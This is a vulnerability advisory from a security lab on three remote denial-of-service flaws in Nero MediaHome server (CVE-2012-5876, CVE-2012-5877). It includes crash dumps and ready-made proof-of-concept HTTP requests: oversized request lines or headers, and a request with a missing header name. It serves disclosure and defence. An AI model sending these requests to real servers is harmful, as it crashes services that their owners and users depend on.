Nero MediaHome Multiple Remote DoS Vulnerabilities

High-Tech Bridge Security Research Lab has discovered multiple DoS vulnerabilities in Nero Media Home server, which could be exploited by a malicious person to crash the server remotely.

1. Off-by-one errors in Nero MediaHome server: CVE-2012-5876
   1.1 The vulnerability exists due to an off-by-one error in NMMediaServerService.dll when handling HTTP requests with overly long request lines. A remote attacker can send multiple HTTP requests with request line of at least 135 168 characters long to port 54444/TCP (Nero MediaHome server’s default port) and cause immediate crash of Nero MediaHome server.
   Crash details:
   EIP: 7c921689 mov ecx,[ecx]
   EAX: 03b2a808 ( 62040072) -> (heap)
   EBX: 003e0000 ( 4063232) -> b@>@>" (heap)
   ECX: 00000000 ( 0) -> N/A
   EDX: 00000000 ( 0) -> N/A
   EDI: 03b2b000 ( 62042112) -> D (heap)
   ESI: 03b2a800 ( 62040064) -> (heap)
   EBP: 0526f854 ( 86440020) -> &|&B>>D&$|>|&>“|>>”&& |(|“|||X<&><& |(|>s|>@>.D. (stack)
   ESP: 0526f848 ( 86440008) -> >”>&|&B>>D&$|>|&>“|>>”&& |(|“|||X<&><& |(|>s|>@>. (stack)
   +00: 003e0000 ( 4063232) -> b@>@>” (heap)
   +04: 00000022 ( 34) -> N/A
   +08: 003e0004 ( 4063236) -> b@>@>" (heap)
   +0c: 0526f88c ( 86440076) -> &$|>|&>“|>>”&& |(|"|||X<&><& |(|>s|>@>.D. D&|>|>|h& (stack)
   +10: 7c928ccd (2089979085) -> N/A
   +14: 00000000 ( 0) -> N/A
   Disasm around:
   0x7c921664 mov ecx,[ebp+0x10]
   0x7c921667 add eax,[ecx]
   0x7c921669 cmp eax,0xfe00
   0x7c92166e ja 0x7c920721
   0x7c921674 cmp byte [ebp+0x14],0x0
   0x7c921678 jnz 0x7c95ae10
   0x7c92167e mov ecx,[esi+0xc]
   0x7c921681 lea eax,[esi+0x8]
   0x7c921684 mov edx,[eax]
   0x7c921686 mov [ebp+0x8],ecx
   0x7c921689 mov ecx,[ecx]
   0x7c92168b cmp ecx,[edx+0x4]
   0x7c92168e mov [ebp+0xc],edx
   0x7c921691 jnz 0x7c921734
   0x7c921697 cmp ecx,eax
   0x7c921699 jnz 0x7c921734
   0x7c92169f push esi
   0x7c9216a0 push ebx
   0x7c9216a1 call 0x7c920684
   0x7c9216a6 mov eax,[ebp+0xc]
   0x7c9216a9 mov ecx,[ebp+0x8]
   Proof of Concept:
   The following HTTP request, sent a number of times, will crash the vulnerable Nero MediaHome server:
   GET /[A * 135168 or more] HTTP/1.1
   HOST: somehost.com
   ACCEPT: /
   Accept-Encoding: None
   User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
   Connection: Close
   Accept-Transfer-Encoding: None

1.2 The vulnerability exists due insufficient validation of HTTP request header values in NMMediaServer.dll. A remote attacker can send a specially crafted HTTP request containing an overly long header value (at least 135 168 characters long) to port 54444/TCP, cause a heap-based buffer overflow and crash the vulnerable application.
Crash details:
EIP: 7c920a19 mov ecx,[ecx]
EAX: 03c3c008 ( 63160328) -> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (heap)
EBX: 003e0000 ( 4063232) -> Tp@>+ (heap)
ECX: 41414141 (1094795585) -> N/A
EDX: 41414141 (1094795585) -> N/A
EDI: 03c1af88 ( 63025032) -> B>VTP/1.1Host localhostUser-Agent Mozilla/5.0 (Windows; U)Accept-Language en-us,en;q=0.5Keep-AliB (heap)
ESI: 03c3c000 ( 63160320) -> BAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA (heap)
EBP: 0527f828 ( 86505512) -> ' (stack) ESP: 0527f81c ( 86505500) -> >!>‘|VAAAAT’A>>B’$|>pgg|’ |(|“|||>”|>><‘’ |(|“||x>‘><’ | (stack)
+00: 003e0000 ( 4063232) -> Tp@>+ (heap)
+04: 00000021 ( 33) -> N/A
+08: 003e0004 ( 4063236) -> Tp@>+ (heap)
+0c: 0527f860 ( 86505568) -> ‘$|>pgg|’ |(|”|||>“|>><‘’ |(|”||x>‘><’ |>@'X4' || (stack)
+10: 7c928ccd (2089979085) -> N/A
+14: 03ad5600 ( 61691392) -> >8*W=>@ 3:X`DS.MetaData.OriginalStreamNumber0[Jp (heap)
Disasm around:
0x7c9209f8 jnz 0x7c95af5f
0x7c9209fe mov al,[esi+0x5]
0x7c920a01 and al,0x10
0x7c920a03 test al,0x10
0x7c920a05 mov [edi+0x5],al
0x7c920a08 jnz 0x7c920aa0
0x7c920a0e mov ecx,[esi+0xc]
0x7c920a11 lea eax,[esi+0x8]
0x7c920a14 mov edx,[eax]
0x7c920a16 mov [ebp+0xc],ecx
0x7c920a19 mov ecx,[ecx]
0x7c920a1b cmp ecx,[edx+0x4]
0x7c920a1e mov [ebp+0x14],edx
0x7c920a21 jnz 0x7c921752
0x7c920a27 cmp ecx,eax
0x7c920a29 jnz 0x7c921752
0x7c920a2f push esi
0x7c920a30 push ebx
0x7c920a31 call 0x7c920684
0x7c920a36 mov eax,[ebp+0x14]
0x7c920a39 mov ecx,[ebp+0xc]
Proof of Concept:
The following HTTP request will crash the vulnerable Nero MediaHome server remotely:
GET / HTTP/1.1
Host somehost.com
User-Agent: Mozilla/5.0 (Windows; U)
Accept-Language: en-us,en;q=0.5
Keep-Alive: 300
Connection: keep-alive
Referer:[A * 265566]

2. NULL pointer dereference in Nero MediaHome server: CVE-2012-5877
   2.1 The vulnerability exists due to a NULL pointer dereference error when handling HTTP request with missing HTTP header name. A remote attacker can send a specially crafted HTTP request with missing HTTP header name and crash Nero MediaHome server.
   Crash details:
   EIP: 10003171 mov [eax+0x18],ebp
   EAX: 00000000 ( 0) -> N/A
   EBX: 037bd090 ( 58445968) -> x4xx @R px?x? (heap)
   ECX: 039cddea ( 60612074) -> localhost (heap)
   EDX: 039cddea ( 60612074) -> localhost (heap)
   EDI: 037bc888 ( 58443912) -> ||{sP@OQ6E}{AY+ (heap)
   ESI: 037c7fb0 ( 58490800) -> ?|?LPCMH|faudio/l16a| ||MP3| (heap)
   EBP: 00000009 ( 9) -> N/A
   ESP: 0563fad0 ( 90438352) -> {s|~{x`)huc1P3quhucuthucuyuuhuhucuuM|$cVhx (stack)
   +00: 037bd090 ( 58445968) -> x4xx @R px?x? (heap)
   +04: 039cdde8 ( 60612072) -> localhostUser-Agent: Mozilla/5.0 (Windows; U)Accept-Language: en-us,en;q=0.5Keep-Alive: 300Connection: keep-aliveReferer: http://www.htbridge.ch (heap)
   +08: 00000000 ( 0) -> N/A
   +0c: 00000001 ( 1) -> N/A
   +10: 000000b8 ( 184) -> N/A
   +14: 037c7318 ( 58487576) -> hhuA_ARG_TYPE_Result7$*pb$ (heap)
   Disasm around:
   0x10003156 mov edx,[esi+0x8]
   0x10003159 mov ebp,[esi+0xc]
   0x1000315c push byte 0x1
   0x1000315e push eax
   0x1000315f push ecx
   0x10003160 push ebx
   0x10003161 mov [edi+0x40],esi
   0x10003164 mov [esp+0x2c],edx
   0x10003168 call 0x10002730
   0x1000316d mov ecx,[esp+0x2c]
   0x10003171 mov [eax+0x18],ebp
   0x10003174 mov ebp,[esp+0x24]
   0x10003178 add esp,0x10
   0x1000317b mov [eax+0x14],ecx
   0x1000317e mov edx,[ebp+0x8]
   0x10003181 test edx,edx
   0x10003183 mov [esp+0x14],edx
   0x10003187 jnz 0x10002ff0
   0x1000318d mov eax,[esp+0x24]
   0x10003191 push eax
   0x10003192 call 0x10002c20
   Proof of Concept:
   The following HTTP request will crash Nero MediaHome server remotely:
   GET / HTTP/1.1
   : somehost.com
   User-Agent: Mozilla/5.0 (Windows; U)
   Accept-Language: en-us,en;q=0.5
   Keep-Alive: 300
   Connection: keep-alive
   Referer: http://www.host.com